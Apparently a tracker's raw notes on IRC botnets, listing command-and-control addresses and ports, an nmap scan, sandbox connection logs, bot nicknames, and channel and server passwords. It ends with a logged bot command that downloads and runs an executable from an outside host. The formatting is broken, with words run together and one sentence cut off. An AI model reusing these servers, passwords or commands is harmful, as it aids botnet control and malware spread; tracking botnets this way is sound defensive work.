206.51.231.148:6667

Interesting ports on 206.51.231.148:(The 1631 ports scanned but not shown below are in state: closed)PORT STATE SERVICE VERSION21/tcp open ftp ProFTPD 1.3.022/tcp open ssh OpenSSH 4.3p2 (protocol 2.0)69/tcp filtered tftp111/tcp filtered rpcbind135/tcp filtered msrpc137/tcp filtered netbios-ns138/tcp filtered netbios-dgm139/tcp filtered netbios-ssn194/tcp filtered irc445/tcp filtered microsoft-ds529/tcp filtered irc-serv593/tcp filtered http-rpc-epmap800/tcp filtered mdbs_daemon994/tcp filtered ircs1025/tcp filtered NFS-or-IIS1026/tcp filtered

Irc.expozed.gov

66.196.40.219 (6667)chanel #Owned topic=Zero is a homoChannels: 4 channels formedLocal users: Current Local Users: 20 Max: 201Global users: Current Global Users: 20 Max: 84

new net

Outgoing ConnectionsTransport Protocol: TCPRemote Address: 69.65.19.125Remote Port: 6667Connection Established: 0Socket: 44 Is protected with Themida in order to prevent the sample from being reverse-engineered. Themida protection can potentially be used by a threat to complicate the manual threat analysis (e.g. the sample would not run under the Virtual Machine). A network-aware worm that uses known

Botnet server

Outgoing Connectionso Transport Protocol: TCPo Remote Address: 66.252.26.2o Remote Port: 6697o Connection Established: 0o Socket: 1656

msnrulz.hi5photos.us

* Outgoing Connectionso Transport Protocol: TCPo Remote Address: 67.202.33.148o Remote Port: 1986o Connection Established: 0o Socket: 1668 dns=msnrulz.hi5photos.us DNS_TYPE_A 67.202.33.148 1idreaming.id.ohost.de DNS_TYPE_A Nick: [00|USA|166110]Username: XP-9269Joined Channel: #!mh! with Password r0xChannel Topic for Channel #!mh!: “D http://hi5gallery.com/images.php?= “Channel Topic for Channel #!mh!: “P http://hi5-image.us/gallery.php?= “Private Message to Channel #!mh!: “msn// Thread Activated: Sending Message.”Private Message to

x2skool.plisat.de

24.117.101.117 (4244)– DNS Queries:x2skool.plisat.de Nick: [00|USA|884551]Username: XP-9872Server Pass: letmeinJoined Channel: ##dR## with Password bole

Small network

78.129.221.118:1986Nick: [00|USA|241365]Username: XP-9968/j #!mh! r0xChannel Topic “P http://images-gallery.org/view.php?=”#!mh!: “msn// Thread Activated: Sending Message.”#!mh!: “msn// Thread Disabled.”[00|USA|241365]: “.login version -s”[00|USA|241365]: “.r.getfile http://file-photos.com/pcguard.jpg c:rtz.exe 1 -s”